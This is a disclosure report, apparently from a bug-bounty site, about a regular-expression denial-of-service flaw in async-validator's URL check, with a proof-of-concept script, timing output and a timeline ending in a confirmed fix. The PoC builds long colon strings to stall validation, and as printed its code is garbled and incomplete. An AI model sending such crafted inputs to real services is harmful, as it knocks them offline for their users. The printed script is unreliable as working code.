Inefficient Regular Expression Complexity in yiminghe/async-validator


Reported on

Sep 12th 2021

✍️ Description

It allows cause a denial of service when validating crafted invalid URLs.

🕵️‍♂️ Proof of Concept

// PoC.js
var asyncValidator = require("async-validator")

const validator =  new asyncValidator.default({
    v: {
        type: 'url',
 for(var i = 1; i <= 50000; i++) {
   var time =;
   var attack_str = '//' + ':'.repeat(i*10000) + '@';
        v: attack_str,
   var time_cost = - time;
   console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")

💥 The Output

attack_str.length: 10003: 203 ms
attack_str.length: 20003: 612 ms
attack_str.length: 30003: 1316 ms
attack_str.length: 40003: 2337 ms
attack_str.length: 50003: 3656 ms
attack_str.length: 60003: 5264 ms
attack_str.length: 70003: 7158 ms
attack_str.length: 80003: 9350 ms
attack_str.length: 90003: 11906 ms
attack_str.length: 100003: 14648 ms


We created a GitHub Issue asking the maintainers to create a a year ago
Yeting Li submitted a
a year ago
We have contacted a member of the yiminghe/async-validator team and are waiting to hear back a year ago
a year ago


yiminghe validated this vulnerability a year ago
Yeting Li has been awarded the disclosure bounty
The fix bounty is now up for grabs
yiminghe confirmed that a fix has been merged on 0e9a16 a year ago
Yeting Li has been awarded the fix bounty
type.ts#L10 has been validated
Yeting Li
a year ago


Hi @admin, can you assign a CVE?

Jamie Slome
a year ago


As mentioned in the other report, we no longer assign CVEs against this vulnerability type.

to join this conversation